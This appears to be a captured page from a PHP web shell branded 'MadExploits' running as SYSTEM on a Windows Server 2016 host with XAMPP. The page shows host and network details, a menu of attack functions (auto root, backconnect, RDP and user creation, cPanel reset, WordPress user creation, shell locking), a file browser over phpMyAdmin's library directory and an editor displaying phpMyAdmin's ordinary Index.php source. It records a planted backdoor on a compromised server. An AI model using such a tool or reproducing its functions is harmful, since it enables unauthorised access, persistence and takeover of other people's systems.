Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
libraries /
classes /
[ HOME SHELL ]
Name
Size
Permission
Action
Charsets
[ DIR ]
drwxrwxrwx
Config
[ DIR ]
drwxrwxrwx
Controllers
[ DIR ]
drwxrwxrwx
Database
[ DIR ]
drwxrwxrwx
Dbi
[ DIR ]
drwxrwxrwx
Di
[ DIR ]
drwxrwxrwx
Display
[ DIR ]
drwxrwxrwx
Engines
[ DIR ]
drwxrwxrwx
Gis
[ DIR ]
drwxrwxrwx
Navigation
[ DIR ]
drwxrwxrwx
Plugins
[ DIR ]
drwxrwxrwx
Properties
[ DIR ]
drwxrwxrwx
Rte
[ DIR ]
drwxrwxrwx
Server
[ DIR ]
drwxrwxrwx
Setup
[ DIR ]
drwxrwxrwx
Twig
[ DIR ]
drwxrwxrwx
Utils
[ DIR ]
drwxrwxrwx
Advisor.php
19.56
KB
-rw-rw-rw-
Bookmark.php
10.74
KB
-rw-rw-rw-
BrowseForeigners.php
11.15
KB
-rw-rw-rw-
CentralColumns.php
44.19
KB
-rw-rw-rw-
Charsets.php
6.14
KB
-rw-rw-rw-
CheckUserPrivileges.php
12.59
KB
-rw-rw-rw-
Config.php
57.38
KB
-rw-rw-rw-
Console.php
3.69
KB
-rw-rw-rw-
Core.php
38.31
KB
-rw-rw-rw-
CreateAddField.php
17.91
KB
-rw-rw-rw-
DatabaseInterface.php
104.47
KB
-rw-rw-rw-
Encoding.php
8.68
KB
-rw-rw-rw-
Error.php
13.34
KB
-rw-rw-rw-
ErrorHandler.php
17.17
KB
-rw-rw-rw-
ErrorReport.php
8.92
KB
-rw-rw-rw-
Export.php
42.76
KB
-rw-rw-rw-
File.php
21.29
KB
-rw-rw-rw-
FileListing.php
2.83
KB
-rw-rw-rw-
Font.php
5.54
KB
-rw-rw-rw-
Footer.php
10.6
KB
-rw-rw-rw-
Header.php
21.87
KB
-rw-rw-rw-
Import.php
56.56
KB
-rw-rw-rw-
Index.php
24.5
KB
-rw-rw-rw-
IndexColumn.php
4.44
KB
-rw-rw-rw-
InsertEdit.php
129.31
KB
-rw-rw-rw-
InternalRelations.php
17.42
KB
-rw-rw-rw-
IpAllowDeny.php
9.57
KB
-rw-rw-rw-
Language.php
4.31
KB
-rw-rw-rw-
LanguageManager.php
23.71
KB
-rw-rw-rw-
Linter.php
5.21
KB
-rw-rw-rw-
ListAbstract.php
2.51
KB
-rw-rw-rw-
ListDatabase.php
4.34
KB
-rw-rw-rw-
Logging.php
2.6
KB
-rw-rw-rw-
Menu.php
22.36
KB
-rw-rw-rw-
Message.php
19.32
KB
-rw-rw-rw-
Mime.php
916
B
-rw-rw-rw-
MultSubmits.php
23.64
KB
-rw-rw-rw-
Normalization.php
40.41
KB
-rw-rw-rw-
OpenDocument.php
8.52
KB
-rw-rw-rw-
Operations.php
81.25
KB
-rw-rw-rw-
OutputBuffering.php
3.71
KB
-rw-rw-rw-
ParseAnalyze.php
2.55
KB
-rw-rw-rw-
Partition.php
7.27
KB
-rw-rw-rw-
Pdf.php
4.37
KB
-rw-rw-rw-
Plugins.php
22.95
KB
-rw-rw-rw-
RecentFavoriteTable.php
12.04
KB
-rw-rw-rw-
Relation.php
79.64
KB
-rw-rw-rw-
RelationCleanup.php
15
KB
-rw-rw-rw-
Replication.php
5.75
KB
-rw-rw-rw-
ReplicationGui.php
21.23
KB
-rw-rw-rw-
Response.php
16.14
KB
-rw-rw-rw-
Sanitize.php
14.51
KB
-rw-rw-rw-
SavedSearches.php
11.94
KB
-rw-rw-rw-
Scripts.php
3.65
KB
-rw-rw-rw-
Session.php
7.62
KB
-rw-rw-rw-
Sql.php
82.09
KB
-rw-rw-rw-
SqlQueryForm.php
17.63
KB
-rw-rw-rw-
StorageEngine.php
13.75
KB
-rw-rw-rw-
SubPartition.php
3.55
KB
-rw-rw-rw-
SysInfo.php
1.61
KB
-rw-rw-rw-
SysInfoBase.php
822
B
-rw-rw-rw-
SysInfoLinux.php
2.16
KB
-rw-rw-rw-
SysInfoSunOS.php
1.89
KB
-rw-rw-rw-
SysInfoWINNT.php
3.27
KB
-rw-rw-rw-
SystemDatabase.php
3.97
KB
-rw-rw-rw-
Table.php
94.87
KB
-rw-rw-rw-
TablePartitionDefinition.php
6.64
KB
-rw-rw-rw-
Template.php
4.02
KB
-rw-rw-rw-
Theme.php
8.62
KB
-rw-rw-rw-
ThemeManager.php
10.42
KB
-rw-rw-rw-
Tracker.php
30.13
KB
-rw-rw-rw-
Tracking.php
40.26
KB
-rw-rw-rw-
Transformations.php
16.27
KB
-rw-rw-rw-
TwoFactor.php
7.14
KB
-rw-rw-rw-
Types.php
24.93
KB
-rw-rw-rw-
Url.php
8.32
KB
-rw-rw-rw-
UserPassword.php
9
KB
-rw-rw-rw-
UserPreferences.php
8.62
KB
-rw-rw-rw-
UserPreferencesHeader.php
4.13
KB
-rw-rw-rw-
Util.php
168.02
KB
-rw-rw-rw-
VersionInformation.php
6.92
KB
-rw-rw-rw-
ZipExtension.php
10.25
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Index.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * holds the database index class * * @package PhpMyAdmin */ declare(strict_types=1); namespace PhpMyAdmin; /** * Index manipulation class * * @package PhpMyAdmin * @since phpMyAdmin 3.0.0 */ class Index { public const PRIMARY = 1; public const UNIQUE = 2; public const INDEX = 4; public const SPATIAL = 8; public const FULLTEXT = 16; /** * Class-wide storage container for indexes (caching, singleton) * * @var array */ private static $_registry = []; /** * @var string The name of the schema */ private $_schema = ''; /** * @var string The name of the table */ private $_table = ''; /** * @var string The name of the index */ private $_name = ''; /** * Columns in index * * @var array */ private $_columns = []; /** * The index method used (BTREE, HASH, RTREE). * * @var string */ private $_type = ''; /** * The index choice (PRIMARY, UNIQUE, INDEX, SPATIAL, FULLTEXT) * * @var string */ private $_choice = ''; /** * Various remarks. * * @var string */ private $_remarks = ''; /** * Any comment provided for the index with a COMMENT attribute when the * index was created. * * @var string */ private $_comment = ''; /** * @var integer 0 if the index cannot contain duplicates, 1 if it can. */ private $_non_unique = 0; /** * Indicates how the key is packed. NULL if it is not. * * @var string */ private $_packed = null; /** * Block size for the index * * @var int */ private $_key_block_size = null; /** * Parser option for the index * * @var string */ private $_parser = null; /** * Constructor * * @param array $params parameters */ public function __construct(array $params = []) { $this->set($params); } /** * Creates(if not already created) and returns the corresponding Index object * * @param string $schema database name * @param string $table table name * @param string $index_name index name * * @return Index corresponding Index object */ public static function singleton($schema, $table, $index_name = '') { Index::_loadIndexes($table, $schema); if (! isset(Index::$_registry[$schema][$table][$index_name])) { $index = new Index(); if (strlen($index_name) > 0) { $index->setName($index_name); Index::$_registry[$schema][$table][$index->getName()] = $index; } return $index; } return Index::$_registry[$schema][$table][$index_name]; } /** * returns an array with all indexes from the given table * * @param string $table table * @param string $schema schema * * @return Index[] array of indexes */ public static function getFromTable($table, $schema) { Index::_loadIndexes($table, $schema); if (isset(Index::$_registry[$schema][$table])) { return Index::$_registry[$schema][$table]; } return []; } /** * Returns an array with all indexes from the given table of the requested types * * @param string $table table * @param string $schema schema * @param int $choices choices * * @return Index[] array of indexes */ public static function getFromTableByChoice($table, $schema, $choices = 31) { $indexes = []; foreach (self::getFromTable($table, $schema) as $index) { if (($choices & Index::PRIMARY) && $index->getChoice() == 'PRIMARY' ) { $indexes[] = $index; } if (($choices & Index::UNIQUE) && $index->getChoice() == 'UNIQUE' ) { $indexes[] = $index; } if (($choices & Index::INDEX) && $index->getChoice() == 'INDEX' ) { $indexes[] = $index; } if (($choices & Index::SPATIAL) && $index->getChoice() == 'SPATIAL' ) { $indexes[] = $index; } if (($choices & Index::FULLTEXT) && $index->getChoice() == 'FULLTEXT' ) { $indexes[] = $index; } } return $indexes; } /** * return primary if set, false otherwise * * @param string $table table * @param string $schema schema * * @return mixed primary index or false if no one exists */ public static function getPrimary($table, $schema) { Index::_loadIndexes($table, $schema); if (isset(Index::$_registry[$schema][$table]['PRIMARY'])) { return Index::$_registry[$schema][$table]['PRIMARY']; } return false; } /** * Load index data for table * * @param string $table table * @param string $schema schema * * @return boolean whether loading was successful */ private static function _loadIndexes($table, $schema) { if (isset(Index::$_registry[$schema][$table])) { return true; } $_raw_indexes = $GLOBALS['dbi']->getTableIndexes($schema, $table); foreach ($_raw_indexes as $_each_index) { $_each_index['Schema'] = $schema; $keyName = $_each_index['Key_name']; if (! isset(Index::$_registry[$schema][$table][$keyName])) { $key = new Index($_each_index); Index::$_registry[$schema][$table][$keyName] = $key; } else { $key = Index::$_registry[$schema][$table][$keyName]; } $key->addColumn($_each_index); } return true; } /** * Add column to index * * @param array $params column params * * @return void */ public function addColumn(array $params) { if (isset($params['Column_name']) && strlen($params['Column_name']) > 0 ) { $this->_columns[$params['Column_name']] = new IndexColumn($params); } } /** * Adds a list of columns to the index * * @param array $columns array containing details about the columns * * @return void */ public function addColumns(array $columns) { $_columns = []; if (isset($columns['names'])) { // coming from form // $columns[names][] // $columns[sub_parts][] foreach ($columns['names'] as $key => $name) { $sub_part = isset($columns['sub_parts'][$key]) ? $columns['sub_parts'][$key] : ''; $_columns[] = [ 'Column_name' => $name, 'Sub_part' => $sub_part, ]; } } else { // coming from SHOW INDEXES // $columns[][name] // $columns[][sub_part] // ... $_columns = $columns; } foreach ($_columns as $column) { $this->addColumn($column); } } /** * Returns true if $column indexed in this index * * @param string $column the column * * @return boolean true if $column indexed in this index */ public function hasColumn($column) { return isset($this->_columns[$column]); } /** * Sets index details * * @param array $params index details * * @return void */ public function set(array $params) { if (isset($params['columns'])) { $this->addColumns($params['columns']); } if (isset($params['Schema'])) { $this->_schema = $params['Schema']; } if (isset($params['Table'])) { $this->_table = $params['Table']; } if (isset($params['Key_name'])) { $this->_name = $params['Key_name']; } if (isset($params['Index_type'])) { $this->_type = $params['Index_type']; } if (isset($params['Comment'])) { $this->_remarks = $params['Comment']; } if (isset($params['Index_comment'])) { $this->_comment = $params['Index_comment']; } if (isset($params['Non_unique'])) { $this->_non_unique = $params['Non_unique']; } if (isset($params['Packed'])) { $this->_packed = $params['Packed']; } if (isset($params['Index_choice'])) { $this->_choice = $params['Index_choice']; } elseif ('PRIMARY' == $this->_name) { $this->_choice = 'PRIMARY'; } elseif ('FULLTEXT' == $this->_type) { $this->_choice = 'FULLTEXT'; $this->_type = ''; } elseif ('SPATIAL' == $this->_type) { $this->_choice = 'SPATIAL'; $this->_type = ''; } elseif ('0' == $this->_non_unique) { $this->_choice = 'UNIQUE'; } else { $this->_choice = 'INDEX'; } if (isset($params['Key_block_size'])) { $this->_key_block_size = $params['Key_block_size']; } if (isset($params['Parser'])) { $this->_parser = $params['Parser']; } } /** * Returns the number of columns of the index * * @return integer the number of the columns */ public function getColumnCount() { return count($this->_columns); } /** * Returns the index comment * * @return string index comment */ public function getComment() { return $this->_comment; } /** * Returns index remarks * * @return string index remarks */ public function getRemarks() { return $this->_remarks; } /** * Return the key block size * * @return int */ public function getKeyBlockSize() { return $this->_key_block_size; } /** * Return the parser * * @return string */ public function getParser() { return $this->_parser; } /** * Returns concatenated remarks and comment * * @return string concatenated remarks and comment */ public function getComments() { $comments = $this->getRemarks(); if (strlen($comments) > 0) { $comments .= "\n"; } $comments .= $this->getComment(); return $comments; } /** * Returns index type (BTREE, HASH, RTREE) * * @return string index type */ public function getType() { return $this->_type; } /** * Returns index choice (PRIMARY, UNIQUE, INDEX, SPATIAL, FULLTEXT) * * @return string index choice */ public function getChoice() { return $this->_choice; } /** * Return a list of all index choices * * @return string[] index choices */ public static function getIndexChoices() { return [ 'PRIMARY', 'INDEX', 'UNIQUE', 'SPATIAL', 'FULLTEXT', ]; } /** * Returns a lit of all index types * * @return string[] index types */ public static function getIndexTypes() { return [ 'BTREE', 'HASH', ]; } /** * Returns HTML for the index choice selector * * @param boolean $edit_table whether this is table editing * * @return string HTML for the index choice selector */ public function generateIndexChoiceSelector($edit_table) { $html_options = '<select name="index[Index_choice]"' . ' id="select_index_choice" ' . ($edit_table ? 'disabled="disabled"' : '') . '>'; foreach (Index::getIndexChoices() as $each_index_choice) { if ($each_index_choice === 'PRIMARY' && $this->_choice !== 'PRIMARY' && Index::getPrimary($this->_table, $this->_schema) ) { // skip PRIMARY if there is already one in the table continue; } $html_options .= '<option value="' . $each_index_choice . '"' . ($this->_choice == $each_index_choice ? ' selected="selected"' : '') . '>' . $each_index_choice . '</option>' . "\n"; } $html_options .= '</select>'; return $html_options; } /** * Returns HTML for the index type selector * * @return string HTML for the index type selector */ public function generateIndexTypeSelector() { $types = ["" => "--"]; foreach (Index::getIndexTypes() as $type) { $types[$type] = $type; } return Util::getDropdown( "index[Index_type]", $types, $this->_type, "select_index_type" ); } /** * Returns how the index is packed * * @return string how the index is packed */ public function getPacked() { return $this->_packed; } /** * Returns 'No' if the index is not packed, * how the index is packed if packed * * @return string */ public function isPacked() { if (null === $this->_packed) { return __('No'); } return htmlspecialchars($this->_packed); } /** * Returns integer 0 if the index cannot contain duplicates, 1 if it can * * @return integer 0 if the index cannot contain duplicates, 1 if it can */ public function getNonUnique() { return $this->_non_unique; } /** * Returns whether the index is a 'Unique' index * * @param boolean $as_text whether to output should be in text * * @return mixed whether the index is a 'Unique' index */ public function isUnique($as_text = false) { if ($as_text) { $r = [ '0' => __('Yes'), '1' => __('No'), ]; } else { $r = [ '0' => true, '1' => false, ]; } return $r[$this->_non_unique]; } /** * Returns the name of the index * * @return string the name of the index */ public function getName() { return $this->_name; } /** * Sets the name of the index * * @param string $name index name * * @return void */ public function setName($name) { $this->_name = (string) $name; } /** * Returns the columns of the index * * @return IndexColumn[] the columns of the index */ public function getColumns() { return $this->_columns; } /** * Get HTML for display indexes * * @return string */ public static function getHtmlForDisplayIndexes() { $html_output = '<div id="index_div" class="width100 ajax" >'; $html_output .= self::getHtmlForIndexes( $GLOBALS['table'], $GLOBALS['db'] ); $html_output .= '<fieldset class="tblFooters print_ignore" style="text-align: ' . 'left;"><form action="tbl_indexes.php" method="post">'; $html_output .= Url::getHiddenInputs( $GLOBALS['db'], $GLOBALS['table'] ); $html_output .= sprintf( __('Create an index on %s columns'), '<input type="number" name="added_fields" value="1" ' . 'min="1" required="required">' ); $html_output .= '<input type="hidden" name="create_index" value="1">' . '<input class="btn btn-primary add_index ajax"' . ' type="submit" value="' . __('Go') . '">'; $html_output .= '</form>' . '</fieldset>' . '</div>'; return $html_output; } /** * Show index data * * @param string $table The table name * @param string $schema The schema name * @param boolean $print_mode Whether the output is for the print mode * * @return string HTML for showing index * * @access public */ public static function getHtmlForIndexes($table, $schema, $print_mode = false) { $indexes = Index::getFromTable($table, $schema); $no_indexes_class = count($indexes) > 0 ? ' hide' : ''; $no_indexes = "<div class='no_indexes_defined$no_indexes_class'>"; $no_indexes .= Message::notice(__('No index defined!'))->getDisplay(); $no_indexes .= '</div>'; if (! $print_mode) { $r = '<fieldset class="index_info">'; $r .= '<legend id="index_header">' . __('Indexes'); $r .= Util::showMySQLDocu('optimizing-database-structure'); $r .= '</legend>'; $r .= $no_indexes; if (count($indexes) < 1) { $r .= '</fieldset>'; return $r; } $r .= Index::findDuplicates($table, $schema); } else { $r = '<h3>' . __('Indexes') . '</h3>'; $r .= $no_indexes; if (count($indexes) < 1) { return $r; } } $r .= '<div class="responsivetable jsresponsive">'; $r .= '<table id="table_index">'; $r .= '<thead>'; $r .= '<tr>'; if (! $print_mode) { $r .= '<th colspan="2" class="print_ignore">' . __('Action') . '</th>'; } $r .= '<th>' . __('Keyname') . '</th>'; $r .= '<th>' . __('Type') . '</th>'; $r .= '<th>' . __('Unique') . '</th>'; $r .= '<th>' . __('Packed') . '</th>'; $r .= '<th>' . __('Column') . '</th>'; $r .= '<th>' . __('Cardinality') . '</th>'; $r .= '<th>' . __('Collation') . '</th>'; $r .= '<th>' . __('Null') . '</th>'; $r .= '<th>' . __('Comment') . '</th>'; $r .= '</tr>'; $r .= '</thead>'; foreach ($indexes as $index) { $row_span = ' rowspan="' . $index->getColumnCount() . '" '; $r .= '<tbody class="row_span">'; $r .= '<tr class="noclick" >'; if (! $print_mode) { $this_params = $GLOBALS['url_params']; $this_params['index'] = $index->getName(); $r .= '<td class="edit_index print_ignore'; $r .= ' ajax'; $r .= '" ' . $row_span . '>' . ' <a class="'; $r .= 'ajax'; $r .= '" href="tbl_indexes.php" data-post="' . Url::getCommon($this_params, '') . '">' . Util::getIcon('b_edit', __('Edit')) . '</a>' . '</td>' . "\n"; $this_params = $GLOBALS['url_params']; if ($index->getName() == 'PRIMARY') { $this_params['sql_query'] = 'ALTER TABLE ' . Util::backquote($table) . ' DROP PRIMARY KEY;'; $this_params['message_to_show'] = __('The primary key has been dropped.'); $js_msg = Sanitize::jsFormat($this_params['sql_query'], false); } else { $this_params['sql_query'] = 'ALTER TABLE ' . Util::backquote($table) . ' DROP INDEX ' . Util::backquote($index->getName()) . ';'; $this_params['message_to_show'] = sprintf( __('Index %s has been dropped.'), htmlspecialchars($index->getName()) ); $js_msg = Sanitize::jsFormat($this_params['sql_query'], false); } $r .= '<td ' . $row_span . ' class="print_ignore">'; $r .= '<input type="hidden" class="drop_primary_key_index_msg"' . ' value="' . $js_msg . '">'; $r .= Util::linkOrButton( 'sql.php' . Url::getCommon($this_params), Util::getIcon('b_drop', __('Drop')), ['class' => 'drop_primary_key_index_anchor ajax'] ); $r .= '</td>' . "\n"; } if (! $print_mode) { $r .= '<th ' . $row_span . '>' . htmlspecialchars($index->getName()) . '</th>'; } else { $r .= '<td ' . $row_span . '>' . htmlspecialchars($index->getName()) . '</td>'; } $r .= '<td ' . $row_span . '>'; $type = $index->getType(); if (! empty($type)) { $r .= htmlspecialchars($type); } else { $r .= htmlspecialchars($index->getChoice()); } $r .= '</td>'; $r .= '<td ' . $row_span . '>' . $index->isUnique(true) . '</td>'; $r .= '<td ' . $row_span . '>' . $index->isPacked() . '</td>'; foreach ($index->getColumns() as $column) { if ($column->getSeqInIndex() > 1) { $r .= '<tr class="noclick" >'; } $r .= '<td>' . htmlspecialchars($column->getName()); if ($column->getSubPart()) { $r .= ' (' . htmlspecialchars($column->getSubPart()) . ')'; } $r .= '</td>'; $r .= '<td>' . htmlspecialchars((string) $column->getCardinality()) . '</td>'; $r .= '<td>' . htmlspecialchars((string) $column->getCollation()) . '</td>'; $r .= '<td>' . htmlspecialchars($column->getNull(true)) . '</td>'; if ($column->getSeqInIndex() == 1 ) { $r .= '<td ' . $row_span . '>' . htmlspecialchars($index->getComments()) . '</td>'; } $r .= '</tr>'; } // end foreach $index['Sequences'] $r .= '</tbody>'; } // end while $r .= '</table>'; $r .= '</div>'; if (! $print_mode) { $r .= '</fieldset>'; } return $r; } /** * Gets the properties in an array for comparison purposes * * @return array an array containing the properties of the index */ public function getCompareData() { $data = [ // 'Non_unique' => $this->_non_unique, 'Packed' => $this->_packed, 'Index_choice' => $this->_choice, ]; foreach ($this->_columns as $column) { $data['columns'][] = $column->getCompareData(); } return $data; } /** * Function to check over array of indexes and look for common problems * * @param string $table table name * @param string $schema schema name * * @return string Output HTML * @access public */ public static function findDuplicates($table, $schema) { $indexes = Index::getFromTable($table, $schema); $output = ''; // count($indexes) < 2: // there is no need to check if there less than two indexes if (count($indexes) < 2) { return $output; } // remove last index from stack and ... while ($while_index = array_pop($indexes)) { // ... compare with every remaining index in stack foreach ($indexes as $each_index) { if ($each_index->getCompareData() !== $while_index->getCompareData() ) { continue; } // did not find any difference // so it makes no sense to have this two equal indexes $message = Message::notice( __( 'The indexes %1$s and %2$s seem to be equal and one of them ' . 'could possibly be removed.' ) ); $message->addParam($each_index->getName()); $message->addParam($while_index->getName()); $output .= $message->getDisplay(); // there is no need to check any further indexes if we have already // found that this one has a duplicate continue 2; } } return $output; } }
Close